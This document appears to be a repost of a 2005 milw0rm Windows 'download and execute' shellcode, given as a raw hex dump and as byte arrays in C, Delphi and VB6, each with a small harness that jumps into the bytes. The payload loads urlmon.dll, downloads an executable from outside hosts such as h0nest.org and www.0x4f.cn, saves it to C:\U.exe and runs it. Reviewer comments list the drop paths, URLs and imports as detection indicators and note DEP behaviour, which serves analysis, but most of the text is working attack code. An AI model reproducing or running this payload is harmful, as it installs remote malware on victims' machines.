milw0rm 上的 win32 download & exec shellcode:
EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865
VC+:
/*
\ ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode ::
\ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:> ::
\ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::
\
*/
#include <stdio.h>
#include <string.h>
/*
 * Raw x86 shellcode bytes followed by a URL literal.  Readable strings inside
 * the buffer: "urlmon.dll\0" and "C:\U.exe\0" (the \x75\x72... and \x43\x3A...
 * runs below) and the download URL "http://h0nest.org/1.exe", which is appended
 * as a separate C literal and so gets an implicit NUL terminator.  Those three
 * strings -- imported library name, drop path, remote host -- are the
 * detection artefacts worth extracting from this sample.
 * NOTE(review): the drop path and URL differ between the listings on this page
 * (C:\g.exe / www.xoxx.us in the hex dump, C:\U.exe / www.0x4f.cn in the Delphi
 * and VB versions), so the byte arrays are variants, not identical copies.
 * NOTE(review): despite the header's "avoid 0x00" remark the array contains
 * embedded NUL bytes (the string terminators).
 * NOTE(review): this is a writable global in .data; on a DEP/NX-enabled
 * system that page is not executable, so calling into it faults -- presumably
 * the 2005-era harness assumes DEP is off.
 */
unsigned char sh4llcode[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://h0nest.org/1.exe";
/*
 * Harness: prints a banner, then treats the sh4llcode byte array as a
 * function and calls it.  Takes no arguments and has no return statement, so
 * main's exit status is whatever falls out if control ever comes back.
 */
int main()
{
/* Function pointer that will be aimed at the data buffer. */
void (*c0de)();
printf("Win32 \"download & exec shellcode\"\n");
/* Writes the array address over the pointer through an int alias.  This only
 * covers the whole pointer where sizeof(int) == sizeof(void*), i.e. 32-bit
 * builds; on a 64-bit build the upper half of c0de is left uninitialised.
 * Undefined behaviour either way (object-pointer to function-pointer through
 * an lvalue of a different type). */
*(int*)&c0de = sh4llcode;
/* Control transfers into the byte buffer here; under DEP this is the line
 * that raises the access violation. */
c0de();
}
// milw0rm.com [2005-12-23]
DELPHI:
// Delphi variant of the same harness: the shellcode is a typed constant byte
// array that is called through an untyped procedure variable.
program download;
const
// 230 raw bytes (0..229).  Readable strings embedded in the array:
// "urlmon.dll", "C:\U.exe" and "http://www.0x4f.cn/test.exe" (the last one
// NUL terminated).  Drop path and URL are the detection artefacts for this
// variant; note the URL differs from the C listing above.
ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe
var
// Untyped procedure variable used to jump into the constant array.
ShellCodeProc: procedure;
begin
// Takes the address of the typed constant.  Whether that memory is executable
// depends on the compiler's section placement and on DEP -- presumably assumed
// executable by this 2005-era harness; on a DEP-enabled system the call faults.
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.
VB:
Attribute VB_Name = "Module1"
' CallWindowProc is imported here only as a way to call an arbitrary address:
' Main passes the byte array's address as lpPrevWndFunc (with all four message
' arguments zero), so user32 calls into the buffer instead of a real window
' procedure.  An import of CallWindowProcA from a module that owns no window
' is itself a useful static indicator for this pattern.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' VB6 variant of the harness: copies the Variant array into a real Byte array
' (so the bytes are contiguous in memory) and then jumps into it.
Sub Main()
' Variant holding the shellcode as an Array() of Variant byte values.
Dim ShellCode
' Contiguous Byte array the shellcode is copied into before the call.
Dim download() As Byte
' Same 230 bytes as the Delphi listing.  Embedded strings: "urlmon.dll",
' "C:\U.exe" and "http://www.0x4f.cn/test.exe" (NUL terminated) -- the drop
' path and URL are the detection artefacts for this variant.
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)
' Element-by-element copy: a Variant array is not a flat byte buffer, the
' Byte array is.
' NOTE(review): i is never declared (no Option Explicit), so it is an implicit Variant.
ReDim download(UBound(ShellCode))
For i = 0 To UBound(ShellCode)
download(i) = ShellCode(i)
Next
' Transfers control to the first byte of the array.  The array's heap memory
' is not executable under DEP, so on a hardened system this call faults.
' NOTE(review): the trailing "|" after End Sub looks like a paste artefact, not VB syntax.
CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&
End Sub |